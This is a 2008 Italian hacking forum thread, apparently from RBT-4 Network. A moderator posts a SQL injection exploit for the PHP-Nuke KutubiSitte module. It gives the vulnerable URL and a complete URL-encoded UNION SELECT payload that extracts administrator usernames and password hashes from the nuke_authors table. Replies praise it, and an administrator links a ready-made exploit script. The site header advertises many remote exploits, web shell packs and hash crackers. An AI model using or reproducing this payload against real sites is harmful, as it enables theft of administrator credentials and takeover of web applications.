RBT-4 Network

RBT-4 Network

Home :: Forum :: Downloads :: Cerca :: No-Paste :: Exploits :: RBT-4 XSS DB :: IT Wardriving DB :: S.Code Bug Finder

3744671 hits

:: [PDF] - Storia e realtà dell' Hacker italiano :: [PDF] - Sicurezza nella navigazione :: PyGTK - Programmazione Python GUI - Italiano :: Sicurezza nelle Wireless LAN - Giuseppe Paternò :: Il TCP/IP e la trasmissione dati su Internet :: Il linguaggio C - Guida pratica alla programmazione :: UnHash - MD5 or SHA1 Bruteforcer :: MD5 cracker BarsWF :: Joomla Security Scanner :: MySQL 64Bit HASH - Bruteforcer :: The Art Of Assembly Language - DOS16 Special Edition :: The Art Of Assembly Language - LINUX Special Edition :: The Art Of Assembly Language - Win32 Special Edition :: Carnivore-PersonalEdition+Source Code :: Sql-Injection Scanners + Guide alle Sql-Inj :: Huge Hackers Toolkit Suite 2006 - 48in1 (AIO) :: MSN Hacks All In One :: Web Shells Pack :: Man-in-the-middle attack (by blackhats security team) :: I Netowork X.25, comprensione della struttura di rete, tecniche di attacco ed identificazione delle :: Social Engeenering, una guida introduttiva (by blackhats security team) :: IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit :: Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3) :: Rational Software Hidden Administrator 1.7 Auth Bypass Exploit :: TinyIdentD <= 2.2 Remote Buffer Overflow Exploit :: webdesproxy 0.0.1 (GET Request) Remote Root Exploit (exec-shield) :: webdesproxy 0.0.1 (GET Request) Remote Buffer Overflow Exploit :: GNU Mailutils imap4d 0.6 Remote Format String Exploit (exec-shield) :: MS Windows DNS RPC Remote Buffer Overflow Exploit (port 445) v2 :: MS Windows DNS DnssrvQuery Remote Stack Overflow Exploit :: XAMPP for Windows <= 1.6.0a mssql_connect() Remote BoF Exploit :: MS Windows DNS RPC Remote Buffer Overflow Exploit (win2k SP4) :: Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32) :: FileCOPA FTP Server <= 1.01 (LIST) Remote Buffer Overflow Exploit (2) :: IPSwitch IMail Server <= 8.20 IMAPD Remote Buffer Overflow Exploit :: IBM Lotus Domino Server 6.5 PRE AUTH Remote Exploit :: dproxy-nexgen Remote Root Buffer Overflow Exploit (x86-lnx) :: CA BrightStor Backup 11.5.2.0 (Mediasvr.exe) Remote Code Exploit :: NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta) :: Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit (Win2K SP4) :: WarFTP 1.65 (USER) Remote Buffer Overlow Exploit (multiple targets) :: Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit :: dproxy <= 0.5 Remote Buffer Overflow Exploit (meta 2.7) :: FutureSoft TFTP Server 2000 Remote SEH Overwrite Exploit :: Mercur Messaging 2005 <= SP4 IMAP Remote Exploit (egghunter mod) :: Mercur Messaging 2005 IMAP (SUBSCRIBE) Remote Exploit (win2k SP4) :: Helix Server 11.0.1 Remote Heap Overflow Exploit (win2k SP4) :: CA BrightStor ARCserve (msgeng.exe) Remote Stack Overflow Exploit :: WarFTP 1.65 (USER) Remote Buffer Overflow SEH Overflow Exploit :: WarFTP 1.65 (USER) Remote Buffer Overflow Exploit (win2k SP4) :: MailEnable Pro/Ent <= 2.37 (APPEND) Remote Buffer Overflow Exploit :: 3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Exploit (perl) :: IPSwitch WS-FTP 5.05 (XMD5) Remote Buffer Overflow Exploit (meta) :: Axigen eMail Server 2.0.0b2 (pop3) Remote Format String Exploit :: MailEnable Professional 2.35 Remote Buffer Overflow Exploit :: MailEnable Enterprise <= 2.32 - 2.34 Remote Buffer Overflow Exploit :: Lotus Domino <= R6 Webmail Remote Password Hash Dumper Exploit :: IP3 NetAccess < 4.1.9.6 Remote Arbitrary File Disclosure Vulnerability :: SunOS 5.10/5.11 in.telnetd Remote Authentication Bypass Exploit :: MySQL 4.x/5.0 User-Defined Function Command Execution Exploit (win) :: Imail 8.10-8.12 (RCPT TO) Remote Buffer Overflow Exploit (meta) :: Imail 8.10-8.12 (RCPT TO) Remote Buffer Overflow Exploit :: CA BrightStor ARCserve (lgserver.exe) Remote Stack Overflow Exploit :: CA BrightStor ARCserve (msgeng.exe) Remote Heap Overflow Exploit 2 :: CA BrightStor ARCserve (msgeng.exe) Remote Heap Overflow Exploit :: 3Com TFTP Service <= 2.0.1 Remote Buffer Overflow Exploit (meta) :: Sami FTP Server 2.0.2 (USER/PASS) Remote Buffer Overflow Exploit :: Mercur Messaging 2005 IMAP Remote Buffer Overflow Exploit :: TFTPDWIN 0.4.2 Remote Buffer Overflow Exploit :: FileCOPA FTP Server <= 1.01 (LIST) Remote BoF Exploit (meta) :: Berlios GPSD <= 2.7 Remote Format String Exploit (meta) :: NaviCOPA Web Server 2.01 (GET) Remote Buffer Overflow Exploit meta :: CA BrightStor ARCserve (tapeeng.exe) Remote Buffer Overflow Exploit :: QK SMTP <= 3.01 (RCPT TO) Remote Buffer Overflow Exploit (pl) :: Durian Web Application Server 3.02 Remote Buffer Overflow Exploit :: MS Windows ASN.1 Remote Exploit (MS04-007) :: ProFTPD <= 1.2.9 rc2 (ASCII File) Remote Root Exploit :: GNU InetUtils ftpd 1.4.2 (ld.so.preload) Remote Root Exploit :: OpenLDAP <= 2.4.3 (KBIND) Remote Buffer Overflow Exploit :: AT-TFTP <= 1.9 (Long Filename) Remote Buffer Overflow Exploit :: 3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Overflow Exploit :: ProFTPD 1.3.0 (sreplace) Remote Stack Overflow Exploit (meta) :: MS Windows NetpManageIPCConnect Stack Overflow Exploit (py) :: Omni-NFS Server 5.2 (nfsd.exe) Remote Stack Overflow Exploit (meta) :: Easy File Sharing Web Server 4 Remote Information Stealer Exploit :: PrivateWire Gateway 3.7 Remote Buffer Overflow Exploit (win32) :: Novell eDirectory 8.8 NDS Server Remote Stack Overflow Exploit :: QK SMTP <= 3.01 (RCPT TO) Remote Buffer Overflow Exploit :: AEP SmartGate 4.3b (GET) Arbitrary File Download Exploit :: Ipswitch IMail Server 2006 / 8.x (RCPT) Remote Stack Overflow Exploit :: McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 (Source) Remote Exploit :: NaviCOPA Web Server 2.01 (GET) Remote Buffer Overflow Exploit :: MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) (2k3) :: Mercur Mailserver 5.0 SP3 (IMAP) Remote Buffer Overflow Exploit (2) :: RaidenHTTPD 1.1.49 (SoftParserFileXml) Remote Code Execution Exploit :: IBM Director < 5.10 (Redirect.bat) Directory Transversal Vulnerability :: MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) (2) :: MDaemon POP3 Server < 9.06 (USER) Remote Heap Overflow Exploit :: Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit (PoC) :: WFTPD 3.23 (SIZE) Remote Buffer Overflow Exploit ::

RBT-4 Network \| I NOSTRI PROGETTI \| I VOSTRI EXPLOIT
	Visualizza tutti i messaggi non letti

Autore PHP-NUKE Sql injection (KutubiSitte) [kid]

lovebug
Moderatore

Avatar Utente

Messaggi: 968
Iscritto: 07.04.07

Scritto il 06-03-2008 18:33

AUTHOR : Lovebug

Il bug è presente nella componente KutubiSitte.

# modules.php?name=KutubiSitte&h_op=hadisgoster&kid=

Exploit :

-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0,aid,pwd,4%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A

http://www.securityfocus.com/archive/1/489219/30/0/threaded

securityfocus

Modificato da lovebug il 06-03-2008 20:24

Invia Messaggio Privato

Autore RE: PHP-NUKE Sql injection (KutubiSitte) [kid]

fxhaxor
Membro

Messaggi: 109
Provenienza: /dev/null
Iscritto: 25.02.08

Scritto il 06-03-2008 19:20

ottimo lavoro

ami proprio i bug eh? lol

...le solite cose...

Invia Messaggio Privato

Autore RE: PHP-NUKE Sql injection (KutubiSitte) [kid]

The_Stooge
Moderatore

Avatar Utente

Messaggi: 2377
Provenienza: Suburbia City
Iscritto: 19.09.07

Scritto il 06-03-2008 19:39

ai ai ai ste variabili non controllate

che è kid? riguarda il componente?

azz... arabetti

Bella lovebug (un nome una garanzia

)

In tutte le cose ci vuole Pazienza

STOOGE SAYS AGAIN:
...chi mi spiega come può essermi utile il processo breve e il legittimo impedimento? Visto che lo fa per tutti vorrei usarlo anch'io...

Invia Messaggio Privato

Autore RE: PHP-NUKE Sql injection (KutubiSitte) [kid]

r080cy90r
Amministratore

Avatar Utente

Messaggi: 5703
Iscritto: 25.11.06

Scritto il 06-03-2008 19:58

e come al solito, qualche modifica ai vecchi exploit (il cui codice visto che è gia stato scritto nn vedo perche vada riscritto) ed ecco l'exploit!

http://www.rbt-4.net/nopaste/viewnopaste.php?id=4838847

Spero nn ti scazzi lovvetto se ogni volta che posti il POC io ti posto l'exploit fatto e finitio...se ti scazza dillo che d'ora in poi lascio la palla a te, anche se mi piace che lavoriamo in coppa, tu trovi il bug e io(non faccioun cazzo )scrivo l'exploit, cioè meglio, modifico l'exploit per il modulo buggato LOL!

REGOLAMENTO:=> http://www.rbt-4.net/forum/viewthread.php?forum_id=56&thread_id=231 <=:TUTTI DEVONO RISPETTARLO

REGOLAMENTO:=> http://www.rbt-4.net/forum/viewthread.php?forum_id=13&thread_id=1036 <=:TUTTI DEVONO RISPETTARLO

Sei stanco? Tutti ti vogliono male? Odi tutti? Il tuo punto di vista non è gradito? La comunita di rbt-4 non ti capisce? Non ti piace il regolamento?
È in atto un complotto massonico-demo-pluto-giudaico ai danni di rbt-4 e nessuno coglie il tuo grido di dolore?
Ricordati:La community di Rbt-4 non è obbligatoria, siamo sicuri che nel mondo là fuori troverai qualcosa di alternativo e di divertente da fare.
(Quella illuminata là in fondo è la porta. Grazie, conserveremo un buon ricordo di te.)

la rete e' la tela spetta a noi usare la giusta tecnica per dipingerla!
r080cy90r w4n7 70 p41n7!!!

mandami_un_pm@rbt4.net

Invia Messaggio Privato

Autore RE: PHP-NUKE Sql injection (KutubiSitte) [kid]

lovebug
Moderatore

Avatar Utente

Messaggi: 968
Iscritto: 07.04.07

Scritto il 06-03-2008 20:30

si tranquillo mi scocciavo di scriverlo

... cmq è stato inserito anke su securityfocus ... dove sono stati citati anke i miei seguaci

.. buon lavoro robo

Invia Messaggio Privato

Autore RE: PHP-NUKE Sql injection (KutubiSitte) [kid]

Dir31
Moderatore

Avatar Utente

Messaggi: 1316
Provenienza: set disassembly-flavor att
Iscritto: 02.07.07

Scritto il 06-03-2008 22:05

Love stai diventando un BugBuster, complimenti vivissimi....Stai postando veramente dell' ottimo materiale ultimamente.....
C'ho una voglia di buttarmi su un source di un cms adesso pazzesca....xD

Bl4ck_Stud3nt:"Catastrofi del nostro secolo: Hiroshima 45, Cernobyl 86, Windows 95, 2007 (s)vista"

The_Rav3n:""L' unico novellino che conosco è il novello, ma quello si beve e basta "

Invia Messaggio Privato

Autore RE: PHP-NUKE Sql injection (KutubiSitte) [kid]

lovebug
Moderatore

Avatar Utente

Messaggi: 968
Iscritto: 07.04.07

Scritto il 07-03-2008 01:02

vuoi dire ke prima non postavo nulla di interessante

... grazie dir e grazie a tutti ragazzi

Invia Messaggio Privato

Vai al Forum: